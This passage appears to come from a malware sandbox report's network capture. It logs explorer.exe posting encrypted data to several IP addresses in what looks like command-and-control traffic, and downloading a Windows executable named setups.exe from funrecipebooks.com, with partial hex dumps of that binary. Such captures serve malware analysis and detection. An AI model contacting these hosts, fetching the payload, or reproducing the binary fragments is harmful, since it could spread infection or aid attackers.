33 58 6c 57 64 55 70 35 4a 44 72 7a 79 41 6a 48 4d 39 58 73 65 Data Ascii: SoBBuU7kVxDmG0AmZXrT40LHoc+oo99hMbtD+ksHc3pQ9v0Nqv1c7LseYpe2YQ9Do/36Dph42Z4qjrSJGZQYwJFGepZABmBex3rMc3FRLrksSsj1E+hYFl4K7RbHpgRXrOhuYKJdoEyC1PYOFZaoKGJymIqR3BotcUSOqGJbAceRWoIdc6gk7A3IHLPE3cU0LFpRj9CS0f8IwhcvZr8p10BInb9sxQzjk5zFEn2sa13XlWdUp5JDrzyAjHM9Xse
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 53 52 66 6f 36 4a 53 72 7a 38 2b 32 78 32 6d 75 63 39 64 4a 2f 58 63 62 63 66 31 76 74 32 35 73 73 44 36 71 4e 63 31 48 75 45 34 44 55 5a 71 50 55 34 64 5a 56 39 7a 79 47 35 7a 4f 4e 31 36 55 76 31 4b 50 58 5a 51 65 52 53 2b 48 6f 43 36 4c 7a 46 69 4d 78 41 78 69 55 73 35 39 63 68 50 48 63 72 43 66 5a 65 54 30 62 66 41 36 31 49 73 39 72 76 48 34 65 54 33 74 64 4b 44 53 70 73 36 5a 48 38 77 72 61 75 6d 4c 4a 36 49 47 46 33 55 32 6b 51 31 70 46 39 74 6d 43 64 6f 33 6b 63 30 74 4b 43 4a 79 6f 67 44 48 58 75 75 6d 43 5a 61 64 46 5a 64 5a 76 6b 66 32 61 4e 64 4e 6a 36 4d 4d 70 69 7a 34 5a 70 69 38 48 39 48 54 2b 6a 69 43 6e 78 47 71 7a 2f 6d 44 42 2b 6d 44 44 73 65 39 42 34 6f 70 62 6f 51 50 63 4e 77 43 63 6d 35 68 72 35 71 78 32 69 33 79 48 71 34 31 4f 69 77 Data Ascii: SRfo6JSrz8+2x2muc9dJ/Xcbcf1vt25ssD6qNc1HuE4DUZqPU4dZV9zyG5zON16Uv1KPXZQeRS+HoC6LzFiMxAxiUs59chPHcrCfZeT0bfA61Is9rvH4eT3tdKDSps6ZH8wraumLJ6IGF3U2kQ1pF9tmCdo3kc0tKCJyogDHXuumCZadFZdZvkf2aNdNj6MMpiz4Zpi8H9HT+jiCnxGqz/mDB+mDDse9B4opboQPcNwCcm5hr5qx2i3yHq41Oiw
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 42 56 6d 64 6a 69 78 75 2f 54 33 4b 46 57 39 32 6a 61 54 79 4b 6a 4d 30 63 67 50 38 7a 61 30 33 6e 75 32 33 49 6d 42 6e 6a 62 63 6d 6c 5a 2b 54 78 2f 77 48 37 38 41 6b 55 4e 59 4c 52 63 51 45 43 47 35 45 36 36 50 70 4e 72 68 38 77 73 39 33 50 53 57 71 42 61 47 46 5a 35 66 68 71 4d 74 63 69 65 46 67 57 42 53 4e 65 76 73 64 56 31 7a 2f 34 77 4d 4d 48 4c 42 65 57 7a 73 67 4c 41 74 36 4a 68 4b 2f 41 4c 47 56 62 51 30 59 39 36 56 4a 43 59 53 34 55 75 69 6b 34 6f 58 78 70 4f 67 6c 2f 68 66 41 65 6e 41 41 45 67 50 6d 46 34 4f 56 36 38 37 63 59 66 64 50 77 52 48 73 71 44 4c 57 6d 56 42 64 56 77 68 50 32 65 45 64 6e 74 4c 44 44 51 2f 6a 57 68 59 6c 65 59 78 39 33 4c 6a 6e 6e 76 41 78 37 5a 49 77 67 78 5a 71 7a 71 77 2f 46 67 76 79 31 42 54 67 64 51 7a 51 75 4d 49 Data Ascii: BVmdjixu/T3KFW92jaTyKjM0cgP8za03nu23ImBnjbcmlZ+Tx/wH78AkUNYLRcQECG5E66PpNrh8ws93PSWqBaGFZ5fhqMtcieFgWBSNevsdV1z/4wMMHLBeWzsgLAt6JhK/ALGVbQ0Y96VJCYS4Uuik4oXxpOgl/hfAenAAEgPmF4OV687cYfdPwRHsqDLWmVBdVwhP2eEdntLDDQ/jWhYleYx93LjnnvAx7ZIwgxZqzqw/Fgvy1BTgdQzQuMI
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 35 74 69 4c 56 6d 46 50 66 48 68 41 70 42 33 6b 34 72 38 56 69 32 64 64 62 39 32 68 44 45 48 66 31 4d 30 64 49 36 62 33 74 58 5a 7a 7a 4a 67 4e 2b 42 66 6a 61 35 6d 64 53 6a 4a 32 47 44 75 35 6b 6e 38 6b 75 33 70 78 67 46 51 63 42 2f 72 79 42 48 43 77 4a 67 79 32 41 42 39 64 74 69 4b 4c 4e 56 67 41 36 4c 49 4e 2b 48 4e 6a 43 43 44 68 2f 4c 38 4e 51 73 49 73 77 61 66 6f 73 6e 4a 4a 66 41 33 7a 53 69 76 42 79 50 66 46 6a 6b 55 58 59 32 56 78 59 72 4e 56 41 53 78 46 69 76 43 56 37 42 66 6b 4d 4b 48 4f 35 75 63 5a 38 7a 57 76 44 36 5a 32 62 6e 72 36 39 76 33 59 37 32 6d 71 71 63 45 4b 4f 64 4a 33 44 45 47 36 62 45 55 57 4a 38 51 6b 4d 53 32 62 47 33 70 36 4f 70 4c 4a 65 66 75 45 62 6f 48 4c 5a 49 70 5a 43 4a 4f 50 75 72 77 58 6a 77 73 47 43 48 52 56 49 55 49 Data Ascii: 5tiLVmFPfHhApB3k4r8Vi2ddb92hDEHf1M0dI6b3tXZzzJgN+Bfja5mdSjJ2GDu5kn8ku3pxgFQcB/ryBHCwJgy2AB9dtiKLNVgA6LIN+HNjCCDh/L8NQsIswafosnJJfA3zSivByPfFjkUXY2VxYrNVASxFivCV7BfkMKHO5ucZ8zWvD6Z2bnr69v3Y72mqqcEKOdJ3DEG6bEUWJ8QkMS2bG3p6OpLJefuEboHLZIpZCJOPurwXjwsGCHRVIUI
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 74 4f 67 63 4c 7a 4d 77 54 2b 72 52 6c 2f 4a 56 31 2b 2f 35 61 65 68 46 30 4a 69 43 7a 57 53 5a 68 66 68 54 73 48 74 51 4d 49 30 4e 34 30 57 6e 74 38 6f 6b 4e 45 61 33 63 55 65 76 4a 79 77 62 67 6f 44 55 31 6d 7a 54 62 50 4f 4a 51 5a 52 52 45 68 49 36 73 46 6b 63 39 76 2b 46 64 65 68 34 44 45 68 59 32 75 35 51 77 5a 72 4a 66 76 76 77 33 38 41 79 32 4a 6a 46 38 34 56 71 63 34 51 49 4b 57 54 55 65 4d 67 4f 50 6b 66 33 6a 50 34 42 41 4f 71 77 39 50 77 47 6c 32 31 42 44 68 35 48 4e 58 64 5a 47 65 4f 6b 75 71 2f 78 68 77 4a 48 54 63 50 41 4c 51 72 45 5a 59 64 2f 51 53 6e 72 78 2b 48 49 2b 71 6c 6d 31 69 4e 5a 31 6a 44 50 6a 4f 57 73 74 4f 6c 32 36 39 4d 44 49 59 4c 7a 78 34 56 38 49 51 4f 33 6b 65 5a 2b 70 53 4b 6a 4b 72 74 56 6c 41 59 38 79 6e 65 65 30 75 42 Data Ascii: tOgcLzMwT+rRl/JV1+/5aehF0JiCzWSZhfhTsHtQMI0N40Wnt8okNEa3cUevJywbgoDU1mzTbPOJQZRREhI6sFkc9v+Fdeh4DEhY2u5QwZrJfvvw38Ay2JjF84Vqc4QIKWTUeMgOPkf3jP4BAOqw9PwGl21BDh5HNXdZGeOkuq/xhwJHTcPALQrEZYd/QSnrx+HI+qlm1iNZ1jDPjOWstOl269MDIYLzx4V8IQO3keZ+pSKjKrtVlAY8ynee0uB
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 36 75 65 78 68 45 2b 58 58 46 75 64 43 63 64 6c 2b 31 58 7a 75 61 70 43 36 46 6d 4d 47 70 7a 45 71 68 37 49 52 4e 44 76 46 45 72 46 50 7a 4c 61 76 59 7a 4b 2f 69 52 34 77 5a 42 53 53 57 53 7a 72 71 31 50 2f 69 66 55 46 78 57 77 4b 56 51 74 68 68 41 65 66 63 61 72 57 75 76 56 42 41 6f 4d 4a 69 70 49 59 62 63 2b 5a 49 76 59 67 62 55 45 34 56 38 34 57 34 79 52 75 68 30 54 35 45 4f 52 44 4f 57 77 77 34 55 4c 58 6e 62 41 6f 6f 34 6d 30 4f 55 71 49 50 71 35 47 37 52 34 64 71 38 50 53 79 2f 7a 69 66 63 56 64 67 4b 6b 64 41 6f 76 61 53 35 4d 4e 56 74 57 4c 66 70 4d 34 42 6e 47 54 35 7a 6a 6d 76 70 6d 46 48 6e 45 71 6c 67 6c 42 72 42 74 36 63 2f 45 33 67 71 36 79 52 6f 6d 70 30 4d 6e 71 37 50 62 66 57 45 77 6e 63 61 6d 4a 6a 4b 72 30 4d 49 4d 46 57 31 74 5a 4c 57 Data Ascii: 6uexhE+XXFudCcdl+1XzuapC6FmMGpzEqh7IRNDvFErFPzLavYzK/iR4wZBSSWSzrq1P/ifUFxWwKVQthhAefcarWuvVBAoMJipIYbc+ZIvYgbUE4V84W4yRuh0T5EORDOWww4ULXnbAoo4m0OUqIPq5G7R4dq8PSy/zifcVdgKkdAovaS5MNVtWLfpM4BnGT5zjmvpmFHnEqlglBrBt6c/E3gq6yRomp0Mnq7PbfWEwncamJjKr0MIMFW1tZLW
2024-07-24 17:56:38 UTC	8948	OUT	Data Raw: 4f 65 57 65 34 61 6f 59 72 75 43 7a 65 33 5a 38 76 7a 6d 4f 74 51 7a 73 74 36 4b 4f 31 31 5a 63 32 32 52 38 73 4f 57 6d 54 69 76 43 52 50 63 53 6e 56 6d 74 56 5a 4e 54 79 54 56 4f 77 4c 4f 4f 6d 49 51 6d 52 30 72 5a 48 6e 73 6b 43 6d 70 78 6c 69 64 39 52 39 72 7a 4b 48 7a 68 75 52 64 5a 72 53 41 51 2b 79 4f 63 6a 63 78 47 39 43 53 38 59 4f 46 74 67 61 56 63 42 53 42 5a 6f 65 4c 45 6f 54 76 71 55 6d 48 76 6e 4c 79 6c 6b 77 66 65 6e 63 66 43 4a 53 74 71 38 76 70 76 4d 4e 44 5a 53 33 68 63 31 64 47 4c 4a 74 31 35 77 6d 66 70 45 64 7a 61 43 47 53 33 61 78 71 56 46 50 61 78 30 6c 48 58 2f 5a 50 41 62 76 75 46 51 53 44 4a 51 41 61 70 46 51 7a 56 35 46 69 59 50 41 75 69 46 43 70 45 74 30 46 38 4f 44 70 56 45 6e 6d 77 4c 50 64 32 51 6e 49 4b 61 54 68 51 65 6a 36 Data Ascii: OeWe4aoYruCze3Z8vzmOtQzst6KO11Zc22R8sOWmTivCRPcSnVmtVZNTyTVOwLOOmIQmR0rZHnskCmpxlid9R9rzKHzhuRdZrSAQ+yOcjcxG9CS8YOFtgaVcBSBZoeLEoTvqUmHvnLylkwfencfCJStq8vpvMNDZS3hc1dGLJt15wmfpEdzaCGS3axqVFPax0lHX/ZPAbvuFQSDJQAapFQzV5FiYPAuiFCpEt0F8ODpVEnmwLPd2QnIKaThQej6
2024-07-24 17:56:40 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 782 Date: Wed, 24 Jul 2024 17:56:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:40 UTC	782	IN	Data Raw: 41 56 52 6d 45 46 6c 51 50 44 31 53 49 2f 55 6e 45 77 77 4c 32 46 7a 36 50 4c 2b 51 5a 52 71 2b 30 55 31 72 6e 6b 36 57 30 32 39 70 49 4e 72 63 50 61 65 61 4c 42 79 4f 6e 55 75 70 64 32 4f 51 73 63 2f 55 58 65 77 62 43 35 72 61 49 78 31 6f 50 38 74 54 33 73 75 47 73 70 32 46 43 44 4d 63 47 4d 6c 2f 54 65 6c 74 48 78 48 4e 55 4f 71 78 42 6a 30 4f 74 41 44 47 66 30 39 57 6a 2b 64 42 44 51 38 52 4c 2f 61 39 2b 36 30 65 2b 69 7a 4d 64 57 41 2b 54 4f 48 77 73 70 4d 6d 4f 59 61 44 4b 73 73 76 6c 78 55 57 4f 33 2f 43 35 51 4b 76 46 68 54 56 37 71 55 38 4b 69 50 70 45 67 48 7a 51 34 36 4b 45 4d 52 35 75 65 61 2b 70 34 69 43 4e 6f 62 66 6e 49 6b 56 53 56 38 32 65 77 53 72 6f 6e 75 45 6b 2b 31 7a 4f 7a 32 57 43 43 43 4c 4d 51 44 4c 6a 4d 33 6b 34 69 36 6d 59 6b 52 Data Ascii: AVRmEFlQPD1SI/UnEwwL2Fz6PL+QZRq+0U1rnk6W029pINrcPaeaLByOnUupd2OQsc/UXewbC5raIx1oP8tT3suGsp2FCDMcGMl/TeltHxHNUOqxBj0OtADGf09Wj+dBDQ8RL/a9+60e+izMdWA+TOHwspMmOYaDKssvlxUWO3/C5QKvFhTV7qU8KiPpEgHzQ46KEMR5uea+p4iCNobfnIkVSV82ewSronuEk+1zOz2WCCCLMQDLjM3k4i6mYkR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49741	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:40 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:56:40 UTC	1122	OUT	Data Raw: 50 35 44 79 64 35 72 6b 4b 6c 2b 4f 33 64 50 6a 50 59 4e 44 77 46 48 71 4f 38 6e 6b 52 54 4a 41 73 62 56 6f 39 4d 48 2b 77 68 30 30 67 55 50 51 78 78 75 73 5a 2b 52 69 59 54 6a 4d 78 42 41 63 2f 5a 71 6f 6b 64 48 57 63 2f 2b 31 38 2f 39 4b 70 35 6c 6c 59 48 75 4f 61 49 72 63 37 44 6f 5a 55 49 4b 67 69 4d 33 65 47 68 4c 77 52 57 53 57 75 2f 48 4c 37 6b 52 71 53 59 62 72 4c 4d 33 65 52 58 77 54 53 35 64 2b 45 38 47 61 71 43 6c 47 6d 2f 7a 56 47 31 38 6f 78 67 62 6a 4b 53 73 64 35 32 47 7a 78 31 2b 6d 68 53 62 70 30 38 5a 33 32 42 74 69 44 45 6f 6f 59 33 54 50 64 78 76 32 54 36 46 4e 39 30 41 39 79 44 2f 75 2b 55 67 68 2b 61 36 39 76 59 42 6b 78 6b 39 6a 6e 70 67 66 63 7a 4c 6c 48 46 39 54 5a 4c 74 64 41 6a 57 74 33 44 41 48 58 6e 73 4a 2f 4d 37 2f 51 45 33 Data Ascii: P5Dyd5rkKl+O3dPjPYNDwFHqO8nkRTJAsbVo9MH+wh00gUPQxxusZ+RiYTjMxBAc/ZqokdHWc/+18/9Kp5llYHuOaIrc7DoZUIKgiM3eGhLwRWSWu/HL7kRqSYbrLM3eRXwTS5d+E8GaqClGm/zVG18oxgbjKSsd52Gzx1+mhSbp08Z32BtiDEooY3TPdxv2T6FN90A9yD/u+Ugh+a69vYBkxk9jnpgfczLlHF9TZLtdAjWt3DAHXnsJ/M7/QE3
2024-07-24 17:56:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:42 UTC	685	IN	Data Raw: 6b 62 43 32 77 2b 58 4e 67 56 71 53 58 64 79 64 73 79 75 45 4f 6f 79 45 4b 39 6f 4c 74 4a 34 42 43 77 62 58 49 72 6c 65 59 33 4e 59 59 6c 42 47 37 76 4b 62 6b 56 70 4d 41 65 32 33 75 42 79 7a 32 63 57 63 4d 37 32 4d 33 6b 42 36 52 52 74 33 62 66 35 6d 59 55 30 64 69 68 46 76 57 73 42 53 6f 70 75 33 78 66 65 6b 67 42 7a 50 32 67 4e 65 6e 4f 43 32 66 4d 33 74 36 31 39 76 49 4b 63 4d 77 59 69 4a 58 53 6f 4f 30 67 6f 48 68 7a 46 31 2f 55 64 67 31 38 46 4e 64 38 6a 7a 65 6a 49 2b 7a 41 6b 5a 50 79 61 33 74 78 6f 73 7a 4a 50 49 57 45 62 4d 46 2f 35 69 78 41 32 66 4d 4e 4c 36 73 42 39 6b 61 45 42 58 46 54 38 69 55 6f 74 4d 31 45 39 4f 6c 2b 65 53 50 71 43 2f 53 65 47 68 32 72 72 74 44 4c 32 4f 73 64 31 6f 4c 51 44 51 2f 2b 5a 4e 6d 45 73 7a 2f 4e 4b 47 67 4f 6f Data Ascii: kbC2w+XNgVqSXdydsyuEOoyEK9oLtJ4BCwbXIrleY3NYYlBG7vKbkVpMAe23uByz2cWcM72M3kB6RRt3bf5mYU0dihFvWsBSopu3xfekgBzP2gNenOC2fM3t619vIKcMwYiJXSoO0goHhzF1/Udg18FNd8jzejI+zAkZPya3txoszJPIWEbMF/5ixA2fMNL6sB9kaEBXFT8iUotM1E9Ol+eSPqC/SeGh2rrtDL2Osd1oLQDQ/+ZNmEsz/NKGgOo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49744	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:43 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1143
2024-07-24 17:56:43 UTC	1143	OUT	Data Raw: 4d 62 6d 47 55 61 35 70 57 63 67 36 79 48 59 47 2b 7a 79 6f 52 70 39 62 58 6e 42 72 38 44 47 75 65 65 4d 4c 6a 78 4f 6e 71 76 41 51 56 4e 31 49 75 53 35 73 2b 4a 71 47 61 51 37 51 6e 38 38 66 45 33 63 65 70 78 58 70 7a 77 49 6f 5a 62 72 35 37 79 65 55 69 77 63 42 6b 6a 55 62 74 4e 56 41 44 4a 4e 62 53 77 7a 70 58 67 6c 52 4c 65 73 57 69 44 42 4a 41 41 49 58 58 54 34 6e 64 71 33 42 5a 53 75 53 74 72 46 33 49 61 53 36 35 46 6d 58 56 76 45 64 53 6c 4c 31 2b 6e 71 31 4c 4e 52 6c 32 53 4a 4a 78 76 2b 36 52 35 53 62 6e 31 71 56 65 4a 30 49 35 44 54 39 77 69 79 74 54 36 5a 76 4e 74 4e 76 43 75 71 35 7a 79 55 59 75 31 56 72 46 75 6b 73 6e 58 64 6d 68 39 57 74 51 6e 41 75 41 35 73 32 41 56 39 4f 63 6c 62 54 4d 37 46 58 76 58 45 6a 6e 6e 7a 37 57 71 31 53 74 7a 41 Data Ascii: MbmGUa5pWcg6yHYG+zyoRp9bXnBr8DGueeMLjxOnqvAQVN1IuS5s+JqGaQ7Qn88fE3cepxXpzwIoZbr57yeUiwcBkjUbtNVADJNbSwzpXglRLesWiDBJAAIXXT4ndq3BZSuStrF3IaS65FmXVvEdSlL1+nq1LNRl2SJJxv+6R5Sbn1qVeJ0I5DT9wiytT6ZvNtNvCuq5zyUYu1VrFuksnXdmh9WtQnAuA5s2AV9OclbTM7FXvXEjnnz7Wq1StzA
2024-07-24 17:56:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:44 UTC	685	IN	Data Raw: 4f 55 6d 75 4f 5a 31 45 64 78 67 35 39 42 35 4f 46 54 77 2f 33 51 48 71 48 76 74 39 64 43 45 76 55 69 34 79 75 4a 4b 38 4e 68 63 32 66 36 42 4c 31 35 68 77 66 74 42 57 34 4e 59 4e 6d 50 4c 37 4f 6b 56 4f 76 6d 56 67 34 6f 6e 65 4e 4f 57 6c 49 47 4b 54 31 59 69 77 2b 49 48 6d 6b 5a 43 70 65 48 6a 6d 31 45 4f 65 74 6e 31 62 70 69 65 70 42 44 63 70 74 42 78 68 35 32 66 4b 4d 49 45 6a 49 51 74 4a 70 6e 55 54 68 36 72 45 74 6a 47 6a 74 70 6f 38 6e 69 38 53 75 52 61 38 76 79 6a 66 50 4f 6d 32 34 44 51 61 61 59 49 79 71 56 59 66 4b 65 73 51 71 52 46 69 63 56 4b 38 43 7a 35 79 6d 35 6a 78 6f 6d 65 51 31 4b 61 34 7a 4a 76 61 72 42 49 35 52 6d 59 71 42 6e 46 69 31 4c 5a 49 4e 76 7a 48 71 65 6e 44 6b 67 47 4b 4b 4e 5a 6e 77 69 67 6f 66 64 79 68 4b 59 55 4f 43 64 2f Data Ascii: OUmuOZ1Edxg59B5OFTw/3QHqHvt9dCEvUi4yuJK8Nhc2f6BL15hwftBW4NYNmPL7OkVOvmVg4oneNOWlIGKT1Yiw+IHmkZCpeHjm1EOetn1bpiepBDcptBxh52fKMIEjIQtJpnUTh6rEtjGjtpo8ni8SuRa8vyjfPOm24DQaaYIyqVYfKesQqRFicVK8Cz5ym5jxomeQ1Ka4zJvarBI5RmYqBnFi1LZINvzHqenDkgGKKNZnwigofdyhKYUOCd/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49745	162.0.235.84	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:43 UTC	166	OUT	GET /setups.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: funrecipebooks.com
2024-07-24 17:56:44 UTC	289	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: application/x-msdownload last-modified: Wed, 24 Jul 2024 14:01:43 GMT accept-ranges: bytes content-length: 141944 date: Wed, 24 Jul 2024 17:56:44 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 0a d1 c2 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 34 01 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 02 00 00 02 00 00 10 b8 02 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEde"04 @ @`@@
2024-07-24 17:56:44 UTC	8192	IN	Data Raw: 0a 0b 0d 16 13 04 2b 14 09 11 04 93 13 05 07 11 05 6f 87 00 00 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e5 06 6f 6a 00 00 06 07 73 35 01 00 0a 2a 08 2a 00 00 01 10 00 00 00 00 1f 00 30 4f 00 05 17 00 00 01 1b 30 05 00 9a 00 00 00 2a 00 00 11 03 6f 33 00 00 0a 2d 07 72 6a 14 00 70 10 01 04 6f 33 00 00 0a 2d 07 72 b6 14 00 70 10 02 00 0e 04 6f 33 00 00 0a 2d 15 72 e4 14 00 70 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a 2b 10 0e 04 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a de 05 26 14 0c de 44 06 2d 02 14 2a 06 6f 6e 00 00 06 6f 61 00 00 0a 73 85 00 00 0a 0b 0d 16 13 04 2b 14 09 11 04 93 13 05 07 11 05 6f 87 00 00 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e5 06 6f 6a 00 00 06 07 73 35 01 00 0a 2a 08 2a 00 00 01 10 00 00 00 00 1f 00 30 4f 00 05 17 00 00 01 1e 02 7b Data Ascii: +oXi2ojs5*0O0o3-rjpo3-rpo3-rprp(_+rp(_&D-onoas+oXi2ojs5*0O{
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: 72 23 1a 00 70 6f 94 01 00 0a 02 7b af 00 00 04 1f 4f 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b af 00 00 04 1f 1c 6f 97 01 00 0a 02 7b af 00 00 04 72 3d 1a 00 70 6f 25 01 00 0a 02 7b b0 00 00 04 17 6f c2 01 00 0a 02 7b b0 00 00 04 20 a4 00 00 00 1f 22 73 92 01 00 0a 6f 93 01 00 0a 02 7b b0 00 00 04 72 4d 1a 00 70 6f 94 01 00 0a 02 7b b0 00 00 04 20 88 00 00 00 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b b0 00 00 04 1f 1b 6f 97 01 00 0a 02 7b b0 00 00 04 72 6f 1a 00 70 6f 25 01 00 0a 02 22 00 00 30 41 22 00 00 c0 41 73 9e 01 00 0a 28 9f 01 00 0a 02 17 28 a0 01 00 0a 02 20 4f 03 00 00 20 b3 01 00 00 73 95 01 00 0a 28 a1 01 00 0a 02 28 a2 01 00 0a 02 7b aa 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ab 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ac 00 Data Ascii: r#po{Oso{o{r=po%{o{ "so{rMpo{ so{o{ropo%"0A"As(( O s(({o({o({
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: 09 00 bd 30 01 00 11 00 bd 30 06 00 19 00 bd 30 0a 00 29 00 bd 30 10 00 31 00 bd 30 15 00 39 00 bd 30 15 00 41 00 bd 30 15 00 51 00 bd 30 1a 00 59 00 bd 30 06 00 71 00 bd 30 20 00 b1 00 bd 30 06 00 81 01 bd 30 06 00 91 01 bd 30 1a 00 31 02 bd 30 06 00 79 03 bd 30 26 00 81 03 bd 30 06 00 99 03 bd 30 2c 00 f1 03 78 10 3d 00 99 00 6b 34 46 00 61 00 bd 30 06 00 b9 00 bd 30 15 00 89 00 4b 13 53 00 01 04 f3 39 5b 00 09 04 bd 30 61 00 a1 00 7f 10 67 00 79 00 bd 30 72 00 19 04 5c 40 81 00 31 00 ca 18 8c 00 79 00 bd 30 15 00 21 04 bd 30 9a 00 19 02 bd 30 a0 00 19 02 c8 16 a7 00 19 02 1c 3d 06 00 19 02 cc 23 06 00 01 04 b1 3a bb 00 01 04 82 1a c2 00 01 04 26 1d c7 00 01 04 26 1d cd 00 01 04 3e 36 d2 00 81 00 bd 30 01 00 61 00 f7 1c 8c 00 49 04 fa 18 e8 00 51 04 ff Data Ascii: 000)01090A0Q0Y0q0 00010y0&00,x=k4Fa00KS9[0agy0r\@1y0!00=#:&&>60aIQ
2024-07-24 17:56:44 UTC	16384	IN	Data Raw: 6e 63 65 6c 42 75 74 74 6f 6e 00 73 65 74 5f 53 68 6f 77 4e 65 77 46 6f 6c 64 65 72 42 75 74 74 6f 6e 00 73 65 74 5f 41 63 63 65 70 74 42 75 74 74 6f 6e 00 52 75 6e 00 43 6f 6d 70 61 72 65 54 6f 00 47 65 74 50 61 74 68 54 6f 00 55 6e 64 6f 00 5f 50 53 49 6e 66 6f 00 48 6f 73 74 43 6f 6d 6d 61 6e 64 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 55 49 43 75 6c 74 75 72 65 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 43 75 6c 74 75 72 65 49 6e 66 6f 00 70 55 69 49 6e 66 6f 00 52 65 67 69 6f 6e 49 6e 66 6f 00 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 00 47 65 74 56 65 72 73 69 6f 6e 49 6e 66 6f 00 76 65 72 73 69 6f 6e 49 6e 66 6f 00 67 65 74 5f 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 48 6f 73 74 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 68 52 65 73 49 6e 66 6f Data Ascii: ncelButtonset_ShowNewFolderButtonset_AcceptButtonRunCompareToGetPathToUndo_PSInfoHostCommandInfooriginalUICultureInfooriginalCultureInfopUiInfoRegionInfoFileVersionInfoGetVersionInfoversionInfoget_InvocationInfoHostInvocationInfohResInfo
2024-07-24 17:56:44 UTC	16320	IN	Data Raw: 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 80 8d 01 54 55 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 53 65 63 75 72 69 74 79 50 65 72 6d 69 73 73 69 6f 6e 46 6c 61 67 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 05 46 6c 61 67 73 00 04 00 00 80 95 2e 01 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 41 74 Data Ascii: ersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TUSystem.Security.Permissions.SecurityPermissionFlag, mscorlib, Version=4.0.0.0, Culture=neutral, 